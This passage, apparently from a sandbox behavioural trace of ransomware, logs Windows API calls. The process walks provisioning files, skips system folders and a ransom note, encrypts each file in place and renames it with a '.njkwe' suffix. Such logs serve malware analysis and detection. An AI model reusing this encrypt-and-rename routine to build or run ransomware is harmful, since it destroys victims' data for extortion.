pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.885] GetProcessHeap () returned 0xbe0000 [0076.886] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.886] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0076.887] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.887] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0076.887] GetProcessHeap () returned 0xbe0000 [0076.887] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.887] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.887] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.887] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.887] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.887] CloseHandle (hObject=0x43c) returned 1 [0076.888] GetProcessHeap () returned 0xbe0000 [0076.888] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.888] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0076.888] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\149__connections_cellular_sfr (france)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\149__Connections_Cellular_SFR (France)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\149__connections_cellular_sfr (france)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.888] GetProcessHeap () returned 0xbe0000 [0076.888] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.888] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9013ce1d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9013ce1d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9013ce1d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml", cAlternateFileName="14__CO~1.PRO")) returned 1 [0076.888] lstrcmpiW (lpString1="14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.888] lstrcmpiW (lpString1="14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.888] lstrcmpiW (lpString1="14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.888] lstrcmpiW (lpString1="14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.888] lstrcmpiW (lpString1="14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.889] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml") returned 160 [0076.889] StrStrIW (lpFirst="14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.889] lstrcmpW (lpString1="14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.889] lstrcmpW (lpString1="14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.889] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\14__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.889] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\14__connections_cellular_optus (australia)_i5$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.889] GetTickCount () returned 0x11538ee [0076.889] GetTickCount () returned 0x11538ee [0076.889] GetTickCount () returned 0x11538ee [0076.889] GetTickCount () returned 0x11538ee [0076.889] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.889] GetProcessHeap () returned 0xbe0000 [0076.889] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.889] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0076.891] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.891] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0076.891] GetProcessHeap () returned 0xbe0000 [0076.891] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.891] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.891] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.891] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.891] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.891] CloseHandle (hObject=0x43c) returned 1 [0076.891] GetProcessHeap () returned 0xbe0000 [0076.891] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.891] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0076.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\14__connections_cellular_optus (australia)_i5$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\14__Connections_Cellular_Optus (Australia)_i5$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\14__connections_cellular_optus (australia)_i5$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.892] GetProcessHeap () returned 0xbe0000 [0076.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.892] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905db923, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x905db923, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x905db923, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x356, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml", cAlternateFileName="150__C~1.PRO")) returned 1 [0076.892] lstrcmpiW (lpString1="150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.892] lstrcmpiW (lpString1="150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.892] lstrcmpiW (lpString1="150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.892] lstrcmpiW (lpString1="150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.892] lstrcmpiW (lpString1="150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.892] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml") returned 160 [0076.892] StrStrIW (lpFirst="150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.892] lstrcmpW (lpString1="150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.892] lstrcmpW (lpString1="150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.892] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\150__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.893] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\150__connections_cellular_e-plus (germany)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.893] GetTickCount () returned 0x11538fe [0076.893] GetTickCount () returned 0x11538fe [0076.893] GetTickCount () returned 0x11538fe [0076.893] GetTickCount () returned 0x11538fe [0076.893] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.893] GetProcessHeap () returned 0xbe0000 [0076.893] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.893] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x356, lpOverlapped=0x0) returned 1 [0076.894] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.894] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x356, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x356, lpOverlapped=0x0) returned 1 [0076.895] GetProcessHeap () returned 0xbe0000 [0076.895] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.895] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.895] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.895] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.895] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.895] CloseHandle (hObject=0x43c) returned 1 [0076.895] GetProcessHeap () returned 0xbe0000 [0076.895] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.895] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0076.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\150__connections_cellular_e-plus (germany)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\150__Connections_Cellular_E-Plus (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\150__connections_cellular_e-plus (germany)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.896] GetProcessHeap () returned 0xbe0000 [0076.896] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.896] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905db923, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x905db923, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x905db923, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x35f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml", cAlternateFileName="151__C~1.PRO")) returned 1 [0076.896] lstrcmpiW (lpString1="151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.896] lstrcmpiW (lpString1="151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.896] lstrcmpiW (lpString1="151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.896] lstrcmpiW (lpString1="151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.896] lstrcmpiW (lpString1="151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.896] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml") returned 170 [0076.896] StrStrIW (lpFirst="151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.896] lstrcmpW (lpString1="151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.896] lstrcmpW (lpString1="151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.896] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\151__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.896] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\151__connections_cellular_deutsche telekom (germany)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.896] GetTickCount () returned 0x11538fe [0076.897] GetTickCount () returned 0x11538fe [0076.897] GetTickCount () returned 0x11538fe [0076.897] GetTickCount () returned 0x11538fe [0076.897] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.897] GetProcessHeap () returned 0xbe0000 [0076.897] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.897] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x35f, lpOverlapped=0x0) returned 1 [0076.898] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.898] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x35f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x35f, lpOverlapped=0x0) returned 1 [0076.898] GetProcessHeap () returned 0xbe0000 [0076.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.898] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.898] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.898] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.899] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.899] CloseHandle (hObject=0x43c) returned 1 [0076.899] GetProcessHeap () returned 0xbe0000 [0076.899] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.899] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0076.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\151__connections_cellular_deutsche telekom (germany)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\151__Connections_Cellular_Deutsche Telekom (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\151__connections_cellular_deutsche telekom (germany)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.900] GetProcessHeap () returned 0xbe0000 [0076.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.900] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90601b92, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90601b92, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90601b92, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml", cAlternateFileName="152__C~1.PRO")) returned 1 [0076.900] lstrcmpiW (lpString1="152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.900] lstrcmpiW (lpString1="152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.900] lstrcmpiW (lpString1="152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.900] lstrcmpiW (lpString1="152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.900] lstrcmpiW (lpString1="152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.900] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml") returned 165 [0076.900] StrStrIW (lpFirst="152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.900] lstrcmpW (lpString1="152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.900] lstrcmpW (lpString1="152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.900] StrCmpNW 